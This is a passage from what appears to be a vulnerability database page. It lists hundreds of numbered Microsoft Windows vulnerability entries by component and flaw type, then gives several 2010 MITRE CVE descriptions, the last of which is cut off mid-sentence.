privilege escalation [11004] Microsoft Windows Server 2012 R2 RDP Restricted Admin Mode weak authentication [10641] Microsoft Windows up to XP Comctl32.dll DSA_InsertItem denial of service [10638] Microsoft Windows up to XP TrueType Font privilege escalation [10632] Microsoft Windows up to XP OpenType Font privilege escalation [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [9944] Microsoft Windows up to XP TCP/IP Stack memory corruption [9943] Microsoft Windows Server 2012 NAT Driver memory corruption [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9423] Microsoft Windows Microsoft WMV Codec privilege escalation [9422] Microsoft Windows GIF DirectShow privilege escalation [9398] Microsoft Windows up to XP TTF privilege escalation [9103] Microsoft Windows TCP/IP Driver Numeric Error [8739] Microsoft Windows Essentials up to 2012 Windows Writer privilege escalation [8722] Microsoft Windows 8/RT/Server 2012 HTTP.sys memory corruption [8208] Microsoft Windows win32k.sys privilege escalation [8207] Microsoft Windows win32k.sys race condition [8203] Microsoft Windows up to 2012 AD LDAP Query privilege escalation [8095] Microsoft Windows Modern Mail weak authentication [7996] Microsoft Windows 8 TrueType Font denial of service [7680] Microsoft Windows XP SP3 Object Linking/Embedding denial of service [7678] Microsoft Windows up to XP TCP FIN WAIT TCP/IP denial of service [7644] Microsoft Windows up to XP .NET Framework callback privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7258] Microsoft Windows up to 8/Server 2012 SSL/TLS privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7233] Microsoft Windows up to XP SP3 TURKTRUST Certificate weak authentication [7128] Microsoft Windows up to XP Font Parser privilege escalation [7123] Microsoft Windows up to XP Font Parser privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6932] Microsoft Windows up to XP win32k.sys denial of service [6931] Microsoft Windows up to XP win32k.sys denial of service [6923] Microsoft Windows up to XP Briefcase Numeric Error [6922] Microsoft Windows up to XP Briefcase denial of service [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [6525] Microsoft Windows Phone 7 Certificate Subject Common Name weak encryption [6029] Microsoft Windows up to XP MS-CHAP V2 Authentication weak encryption [5942] Microsoft Windows XP Remote Desktop Protocol memory corruption [5941] Microsoft Windows XP Remote Administration Protocol memory corruption [5940] Microsoft Windows XP Remote Administration Protocol memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5663] Microsoft Windows 7/Vista Gadgets memory corruption [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5361] Microsoft Windows privilege escalation [5359] Microsoft Windows XP t2embed.dll denial of service [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4546] Microsoft Windows NT Ntdll.dll unknown vulnerability [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4532] Microsoft Windows Embedded ClickOnce Application memory corruption [4484] Microsoft Windows Phone 7.5 SMS Service weak encryption [4481] Microsoft Windows Media Player ENCDEC.DLL privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4458] Microsoft Windows Apple Safari win32k.sys privilege escalation [4455] Microsoft Windows XP Keyboard Layout win32k.sys denial of service [4452] Microsoft Windows Adctive Directory Query memory corruption [4451] Microsoft Windows Kernel Exception privilege escalation [4450] Microsoft Windows OLE Objects Property privilege escalation [4449] Microsoft Windows CSRSS Device Event Message privilege escalation [4448] Microsoft Windows 7/Vista/XP Media DVR-MS Parser privilege escalation [4447] Microsoft Windows Time ActiveX Control privilege escalation [4440] Microsoft Windows Active Directory weak authentication [4439] Microsoft Windows True Type Fonts privilege escalation [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4436] Microsoft Windows True Type Fonts win32k.sys memory corruption [4431] Microsoft Windows SSL/TLS IV privilege escalation [4422] Microsoft Windows Driver win32k.sys memory corruption [4421] Microsoft Windows Ancillary Function Driver privilege escalation [4410] Microsoft Windows Library Loader privilege escalation [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4395] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4394] Microsoft Windows DNS Service Domain Lookup memory corruption [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4392] Microsoft Windows Remote Access Service privilege escalation [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4389] Microsoft Windows Remote Desktop Protocol denial of service [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4386] Microsoft Windows XP denial of service [4382] Microsoft Windows CSRSS memory corruption [4381] Microsoft Windows 7/Vista Bluetooth Driver Object privilege escalation [4380] Microsoft Windows Driver win32k.sys denial of service [4373] Microsoft Windows MHTML cross site scripting [4371] Microsoft Windows Distributed File System memory corruption [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4366] Microsoft Windows OLE Automatisation Numeric Error [4365] Microsoft Windows OpenType Font privilege escalation [4364] Microsoft Windows Active Directory cross site scripting [4363] Microsoft Windows SMB Client privilege escalation [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4361] Microsoft Windows Ancillary Function Driver privilege escalation [4347] Microsoft Windows WINS Service privilege escalation [4339] Microsoft Windows JScript/VBScript Numeric Error [4338] Microsoft Windows DNS privilege escalation [4337] Microsoft Windows OpenType Font memory corruption [4336] Microsoft Windows Driver win32k.sys denial of service [4335] Microsoft Windows GDI+ Numeric Error [4333] Microsoft Windows Wordpad privilege escalation [4331] Microsoft Windows SMB Transaction Parser privilege escalation [4314] Microsoft Windows DirectShow/Windows Media privilege escalation [4313] Microsoft Windows Remote Desktop Client privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4238] Microsoft Windows Data Access Components Numeric Error [4237] Microsoft Windows Thumbnail Bitmap Parser memory corruption [4235] Microsoft Windows Fax Cover Page Editor memory corruption [4233] Microsoft Windows privilege escalation [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4230] Microsoft Exchange 2007 on 64-bit RPC store.exe denial of service [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4226] Microsoft Windows OpenType Font Driver privilege escalation [4225] Microsoft Windows Routing/Remote Access NDProxy memory corruption [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4207] Microsoft Windows Keyboard Layout win32k.sys memory corruption [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4202] Microsoft Windows Keyboard Layout win32k.sys Windows Class privilege escalation [4201] Microsoft Windows OpenType Font Parser Numeric Error [4198] Microsoft Windows Shell/Wordpad privilege escalation [4195] Microsoft Windows Integer Truncation Common Control Library memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4193] Microsoft Windows OpenType Font Parser privilege escalation [4192] Microsoft Windows LPC Message memory corruption [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4185] Microsoft Windows Client/Server Run-Time Subsystem privilege escalation [4184] Microsoft Windows LSASS memory corruption [4183] Microsoft Windows Unicode Script Processor privilege escalation [4182] Microsoft Windows MPEG-4 Codec Content Parser privilege escalation [4166] Microsoft Windows SMB Server privilege escalation [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4161] Microsoft Windows TLS/SSL Session weak encryption [4158] Microsoft Windows Driver win32k.sys CreateDIBPalette memory corruption [4152] Microsoft Windows MFC Document Title Updating memory corruption [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4139] Microsoft Windows Help/Support Center privilege escalation [4136] Microsoft Windows Media Decompression privilege escalation [4135] Microsoft Windows Kernel Mode Driver privilege escalation [4134] Microsoft Windows OpenType Compact Font Format Driver privilege escalation [4126] Microsoft Windows Mail STAT Numeric Error [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4105] Microsoft Windows SMB Client denial of service [4104] Microsoft Windows SMTP Service privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4102] Microsoft Windows Authentication Verification privilege escalation [4101] Microsoft Windows ISATAP privilege escalation [4100] Microsoft Windows MPEG Layer-3 Codec memory corruption [4089] Microsoft Windows Movie Maker memory corruption [4088] Microsoft Windows HLP File MsgBox privilege escalation [4087] Microsoft Windows DirectShow memory corruption [4086] Microsoft Windows CSRSS privilege escalation [4085] Microsoft Windows SMB Client privilege escalation [4084] Microsoft Windows Shell privilege escalation [4083] Microsoft Windows Paint Numeric Error [4076] Microsoft Windows Embedded OpenType Font Engine Numeric Error [4070] Microsoft Windows Indeo Codec memory corruption [4068] Microsoft Windows MS-CHAP Authentication privilege escalation [4067] Microsoft Windows Active Directory Federation Service privilege escalation [4066] Microsoft Windows Local Security Authority Subsystem denial of service [4060] Microsoft Windows Win32k Kernel Mode Driver privilege escalation [4058] Microsoft Windows Active Directory denial of service [4051] Microsoft Windows GDI+ privilege escalation [4050] Microsoft Windows ActiveX Control memory corruption [4049] Microsoft Windows ActiveX Controls ATL OleLoadFromStream privilege escalation [4044] Microsoft Windows Media Runtime privilege escalation [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4028] Microsoft Windows ASF/MP3 Media privilege escalation [4026] Microsoft Windows DHTML Editing ActiveX Control privilege escalation [4025] Microsoft Windows privilege escalation [4016] Microsoft Windows Remote Desktop Connection memory corruption [4014] Microsoft Windows Workstation Service denial of service [4013] Microsoft Windows Message Queuing Service privilege escalation [4012] Microsoft Windows WINS Service Numeric Error [4011] Microsoft Windows WINS Service memory corruption [4010] Microsoft Windows AVI Movie privilege escalation [4001] Microsoft Windows DirectShow memory corruption [3998] Microsoft Windows Embedded OpenType Font Engine memory corruption [3997] Microsoft Windows Embedded OpenType Font Engine Numeric Error [3990] Microsoft Windows Print Spooler memory corruption [3989] Microsoft Windows Print Spooler memory corruption [3988] Microsoft Windows Print Spooler EnumeratePrintShares memory corruption [3979] Microsoft Windows DirectShow memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3950] Microsoft Windows HTTP Service Numeric Error [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3895] Microsoft Windows GDI Image Parser memory corruption [3894] Microsoft Windows GDI Image Parser Numeric Error [3893] Microsoft Windows WordPad denial of service [3866] Microsoft Windows SMB Authentication weak authentication [3860] Microsoft Windows Path Canonicalisation EclipsedWing privilege escalation [3853] Microsoft Windows Ancillary Function Driver privilege escalation [3852] Microsoft Windows SMB memory corruption [3851] Microsoft Windows IIS IPP Service Numeric Error [3850] Microsoft Windows privilege escalation [3849] Microsoft Windows denial of service [3846] Microsoft Windows privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3822] Microsoft Windows GDI+ BMP Image Numeric Error [3821] Microsoft Windows GDI+ WMF File Numeric Error [3820] Microsoft Windows GDI+ GIF Image Numeric Error [3819] Microsoft Windows GDI+ EMF File Numeric Error [3818] Microsoft Windows GDI+ Numeric Error [3812] Microsoft Windows Vista Bitlocker Password Output information disclosure [3806] Microsoft Windows Color Management memory corruption [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3733] Microsoft Windows Active Directory privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3730] Microsoft Windows Vista/XP privilege escalation [3699] Microsoft Windows CE Image privilege escalation [3686] Microsoft Windows privilege escalation [3675] Microsoft Windows Kernel privilege escalation [3674] Microsoft Windows ActiveX Control hxvz.dll privilege escalation [3673] Microsoft Windows memory corruption [3672] Microsoft Windows GDI WMF Color Depth memory corruption [3603] Microsoft Windows NT 4.0/2000/XP/Vista OLE Automation privilege escalation [3542] Microsoft Windows LSASS privilege escalation [3541] Microsoft Windows ICMP Fragmentation memory corruption [3540] Microsoft Windows IGMPv3/MLDv2 memory corruption [3505] Microsoft Windows Vista Kernel Legacy Reply Path Validator privilege escalation [3504] Microsoft Windows Message Queue memory corruption [3500] Microsoft Windows Vista SMBv2 Signing privilege escalation [3372] Microsoft Windows SharePoint Services cross site scripting [3368] Microsoft Windows up to Vista NNTP Response memory corruption [3367] Microsoft Windows Kodak Image Viewer privilege escalation [3302] Microsoft Windows Services for UNIX privilege escalation [3253] Microsoft Windows OLE Automation substringData memory corruption [3242] Microsoft Windows VML Vector Markup Language memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3179] Microsoft Windows Active Directory denial of service [3178] Microsoft Windows Active Directory memory corruption [3177] Microsoft Windows Vista Firewall Teredo unknown vulnerability [3128] Microsoft Windows Win32 API memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3005] Microsoft Windows XP memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2991] Microsoft Windows Vista ATI Radeon Kernel Mode Driver denial of service [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2932] Microsoft Windows Malware Protection Engine Integer Coercion Error [2925] Microsoft Windows HTML Help ActiveX Control memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2788] Microsoft Windows up to Vista CSRSS WINSRV.DLL MessageBox memory corruption [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2724] Microsoft Windows up to 10 Media Player memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2640] Microsoft Windows XP Windows NAT Helper Component ipnathlp.dll denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2520] Microsoft Windows XP Pragmatic General Multicast privilege escalation [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2370] Microsoft Windows 2000/Server 2003/XP Server Protocol Driver memory corruption [2369] Microsoft Windows 2000/Server 2003/XP Server Service Mailslot memory corruption [2366] Microsoft Windows 2000/Server 2003/XP DHCP Client memory corruption [2311] Microsoft Windows 2000/Server 2003/XP MRXSMB.SYS MRxSmbCscIoctlOpenForCopyChunk privilege escalation [2309] Microsoft Windows 2000/Server 2003/XP Routing/Remote Access Service memory corruption [2307] Microsoft Windows 2000/Server 2003/XP JScript Object memory corruption [2306] Microsoft Windows 2000/Server 2003/XP IP Source Routing memory corruption [2305] Microsoft Windows Server 2003/XP ART Image memory corruption [2295] Microsoft Windows 9/10 Media Player memory corruption [2275] Microsoft Windows Server 2003/XP mhtml URI inetcomm.dll memory corruption [2221] Microsoft Windows 2000/XP CHM Archive itss.dll memory corruption [2218] Microsoft Windows 2000/Server 2003/XP MSDTC memory corruption [2147] Microsoft Windows 2000/Server 2003/XP COM Object memory corruption [2054] Microsoft Windows up to 10 Media Player memory corruption [2051] Microsoft Windows Server 2003/XP Web Client Service memory corruption [2050] Microsoft Windows Server 2003/XP TCP/IP IGMP memory corruption [2049] Microsoft Windows 2000/Server 2003/XP Media Player memory corruption [2036] Microsoft Windows Server 2003/XP Service privilege escalation [1962] Microsoft Windows 2000/Server 2003/XP Web Fonts memory corruption [1934] Microsoft Windows Server 2003/XP WMF File privilege escalation [1917] Microsoft Windows NT 4.0/2000 unknown vulnerability [1909] Microsoft Windows up to XP SP1 UPnP GetDeviceList denial of service [1876] Microsoft Windows 2000/XP WMF/EMF File Integer Coercion Error [1801] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [1798] Microsoft Windows 2000/Server 2003/XP Transaction Internet Protocol denial of service [1797] Microsoft Windows 2000/Server 2003/XP COM+ memory corruption [1796] Microsoft Windows 2000/Server 2003/XP Distributed Transaction Coordinator memory corruption [1793] Microsoft Windows 2000/Server 2003/XP Explorer HTML Preview cross site scripting [1792] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1791] Microsoft Windows 2000/Server 2003/XP lnk File memory corruption [1789] Microsoft Windows 2000/Server 2003/XP Plug-and-Play Service memory corruption [1781] Microsoft Windows XP Wireless Zero Configuration WZCQueryInterface unknown vulnerability [1726] Microsoft Windows XP SP2 unknown vulnerability [1692] Microsoft Windows up to Server 2003 Print Spooler memory corruption [1691] Microsoft Windows 2000/Server 2003/XP Kerberos memory corruption [1690] Microsoft Windows 2000/Server 2003/XP Kerberos denial of service [1689] Microsoft Windows up to Server 2003 Plug-and-Play Service memory corruption [1687] Microsoft Windows up to XP Telephony Application Programming Interface memory corruption [1653] Microsoft Windows up to XP USB Driver memory corruption [1623] Microsoft Windows 2000/XP Network Connectivity netman.dll denial of service [1621] Microsoft Windows up to XP SP2 Kernel denial of service [1596] Microsoft Windows 95/98/2000/Server 2003/XP Color Management memory corruption [1570] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1569] Microsoft Windows Server 2003/XP Web Client Service memory corruption [1568] Microsoft Windows 2000/Server 2003/XP Agent Internet Content cross site scripting [1567] Microsoft Windows 2000/Server 2003/XP HTML Help Input memory corruption [1547] Microsoft Windows 2000/Server 2003/XP Remote Desktop mstlsapi.dll weak authentication [1411] Microsoft Windows up to XP SP2 Image denial of service [1407] Microsoft Windows 2000 Web View webvw.dll memory corruption [1358] Microsoft Windows 2000/Server 2003/XP CSRSS memory corruption [1357] Microsoft Windows 2000/Server 2003/XP Objekt Manager memory corruption [1356] Microsoft Windows 2000/Server 2003/XP Kernel Access memory corruption [1355] Microsoft Windows 2000/Server 2003/XP Font File memory corruption [1350] Microsoft Windows 2000/Server 2003/XP Shell MSHTA.EXE memory corruption [1328] Microsoft Windows Server 2003 Print Color Adjustment denial of service [1327] Microsoft Windows Server 2003 SMB denial of service [1291] Microsoft Windows 2000 EMF File GetEnhMetaFilePaletteEntries denial of service [1268] Microsoft Windows Server 2003/XP TCP/IP Stack denial of service [1196] Microsoft Windows up to XP/Server 2003 Drag / Drop memory corruption [1195] Microsoft Windows 98/2000/ME/XP OLE File memory corruption [1194] Microsoft Windows/Office up to XP COM File unknown vulnerability [1193] Microsoft Windows NT 4.0/2000/Server 2003 License Logging Server privilege escalation [1191] Microsoft Windows XP Hyperlink Object Library memory corruption [1190] Microsoft Windows XP Named Pipe Connection memory corruption [1189] Microsoft Windows 2000/Server 2003/XP SMB memory corruption [1107] Microsoft Windows Server 2003/XP Indexing Service memory corruption [1088] Microsoft Windows up to XP SP2 HLP File winhlp32.exe memory corruption [1087] Microsoft Windows up to XP SP2 ANI File memory corruption [1086] Microsoft Windows up to XP SP2 LoadImage API memory corruption [1076] Microsoft Windows 9 Media Player setItemInfo privilege escalation [1075] Microsoft Windows 9 Media Player getItemInfoByAtom information disclosure [1070] Microsoft Windows XP SP2 privilege escalation [1042] Microsoft Windows up to Server 2003 HyperTerminal URL memory corruption [1041] Microsoft Windows up to XP WINS Name Validator memory corruption [1040] Microsoft Windows up to XP Local Security Authority Subsystem Service memory corruption [1039] Microsoft Windows up to XP Local Procedure Call memory corruption [1038] Microsoft Windows up to XP WordPad Word for Windows 6.0 Converter memory corruption [1037] Microsoft Windows NT 4.0 DHCP Service memory corruption [1036] Microsoft Windows NT 4.0 Server memory corruption [1011] Microsoft Windows WINS memory corruption [937] Microsoft Windows XP WAV Media File denial of service [909] Microsoft Windows NT 4.0/2000/XP ASCII Editor unknown vulnerability [908] Microsoft Windows XP JPEG ActiveX Image Control asycpict.dll denial of service [899] Microsoft Windows memory corruption [898] Microsoft Windows XP on 64-bit SMTP DNS Reply memory corruption [897] Microsoft Windows Server 2003/XP ZIP Archive dunzip32.dll memory corruption [891] Microsoft Windows memory corruption [890] Microsoft Windows denial of service [889] Microsoft Windows memory corruption [888] Microsoft Windows privilege escalation [886] Microsoft Windows denial of service [885] Microsoft Windows 2000/Server 2003/XP WebDAV XML Message denial of service [883] Microsoft Windows NT 4.0/2000/Server 2003 memory corruption [862] Microsoft Windows 2000/XP SYSTEM32 memory corruption [860] Microsoft Windows 2000/XP Packet Fragmentation denial of service [833] Microsoft Windows memory corruption [792] Microsoft Windows up to XP SP2 Internet Download cmd.exe unknown vulnerability [765] Microsoft Windows memory corruption [764] Microsoft Windows NT 4.0/2000/XP Task Scheduler containing memory corruption [763] Microsoft Windows NT 4.0/2000 POSIX Subsystem memory corruption [761] Microsoft Windows 2000 Utility Manager winhlp32.exe memory corruption [683] Microsoft Windows 2000 weak authentication [664] Microsoft Windows 2000/XP CLSID desktop.ini memory corruption [655] Microsoft Windows FTPD Sasser Worm memory corruption [637] Microsoft Windows NetBIOS Share Name memory corruption [618] Microsoft Windows Server 2003 MS04-011 Patch unknown vulnerability [610] Microsoft Windows up to XP/Server 2003 ASN.1 Library memory corruption [609] Microsoft Windows 2000/Server 2003/XP Negotiate Security Software Provider memory corruption [608] Microsoft Windows NT 4.0/2000 Virtual DOS Machine denial of service [607] Microsoft Windows NT 4.0/2000/XP Local Descriptor Table privilege escalation [606] Microsoft Windows XP Taskmanager memory corruption [605] Microsoft Windows 2000 Utility Manager memory corruption [604] Microsoft Windows Server 2003/XP Help/Support Center memory corruption [603] Microsoft Windows 2000 Metafile WMF/EMF Integer Coercion Error [602] Microsoft Windows NT 4.0/2000/XP WinLogon Domain Object memory corruption [601] Microsoft Windows up to XP/Server 2003 PCT Message memory corruption [600] Microsoft Windows 2000 Domain Controller memory corruption [599] Microsoft Windows up to Server 2003 LSASS Request memory corruption [564] Microsoft Windows XP on WinXP WMF File explorer.exe denial of service [530] Microsoft Windows XP EMF File shimgvw.dll Integer Coercion Error [518] Microsoft Windows Server 2003/XP ntdll.dll unknown vulnerability [516] Microsoft Windows up to XP SP1 BMP Image imgbmp.cxx memory corruption [509] Microsoft Windows NT 4.0/2000/XP/Server 2003 WINS Server GS privilege escalation [508] Microsoft Windows NT 4.0/2000/XP/Server 2003 ASN.1 lsass.exe Integer Coercion Error [491] Microsoft Windows XP .folder memory corruption [441] Microsoft Windows SHELL32.DLL memory corruption [414] Microsoft Windows XP BIOS Date Reset denial of service [383] Microsoft Windows 2000/XP Workstation Service memory corruption [350] Microsoft Windows 2000/NT/Server 2003/XP HTML Help memory corruption [348] Microsoft Windows XP CommCtl32.dll memory corruption [332] Microsoft Windows NT 4.0/2000/XP Messenger Service memory corruption [328] Microsoft Windows 2000 Message Queuing Service mqsvc.exe memory corruption [323] Microsoft Windows Server 2003 Shell Folder information disclosure [318] Microsoft Windows Media Player 6.4/7/7.1/9 unknown vulnerability [312] Microsoft Windows 2000/Server 2003/Vista/XP PostThreadMessage unknown vulnerability [286] Microsoft Windows Server 2003 Buffer Overflow Protection unknown vulnerability [278] Microsoft Windows XP ZIP Manager memory corruption [270] Microsoft Windows XP SP1 TCP Packet unknown vulnerability [269] Microsoft Windows up to 98 SP1 UDP Fragment denial of service [261] Microsoft Windows NT 4.0 NetBIOS information disclosure [249] Microsoft Windows NT 4.0/2000/XP/Server 2003 Blaster/Eske memory corruption [193] Microsoft Windows up to 8.x Media Player unknown vulnerability [179] Microsoft Windows XP desktop.ini memory corruption [175] Microsoft Windows up to 2000 SP3 SMTP Timestamp denial of service [165] Microsoft Windows NT 4.0/2000/XP SMB memory corruption [164] Microsoft Windows up to XP/Server 2003 HTML Converter memory corruption [158] Microsoft Windows 2000/XP rundll32.exe memory corruption [155] Microsoft Windows up to 2000 SP3 LDAP Cryptnet.DLL denial of service [153] Microsoft Windows 2000 Terminal Service unknown vulnerability [151] Microsoft Windows up to 2000 SP3 ModifyDN Request denial of service [150] Microsoft Windows up to 2000 SP3 Domain Controller unknown vulnerability [149] Microsoft Windows up to 2000 SP3 Port Name API memory corruption [146] Microsoft Windows up to 2000 SP3 IMAADPCM cbDestLength memory corruption [145] Microsoft Windows 2000 Active Directory weak authentication [135] Microsoft Windows 2000 API ShellExecute memory corruption [134] Microsoft Windows up to 2000 SP3 Active Directory memory corruption [124] Microsoft Windows 5 Media Service ISAPI Extension /scripts memory corruption [123] Microsoft Windows 9 Media Player privilege escalation [71] Microsoft Windows Media Player unknown vulnerability [69] Microsoft Windows XP Internet Connection Firewall unknown vulnerability [61] Microsoft Windows XP Media Player 7.1 privilege escalation [41] Microsoft Windows Form Input Type denial of service [9] Microsoft Windows riched20.dll memory corruption [8] Microsoft Windows NT 4.0/2000 cmd.exe cd memory corruption [4] Microsoft Windows 2000 NetBIOS denial of service MITRE CVE - https://cve.mitre.org: [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3139] Untrusted search path vulnerability in Microsoft Windows Progman Group Converter (grpconv.exe) allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse imm.dll that is located in the same folder as a .grp file. [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and 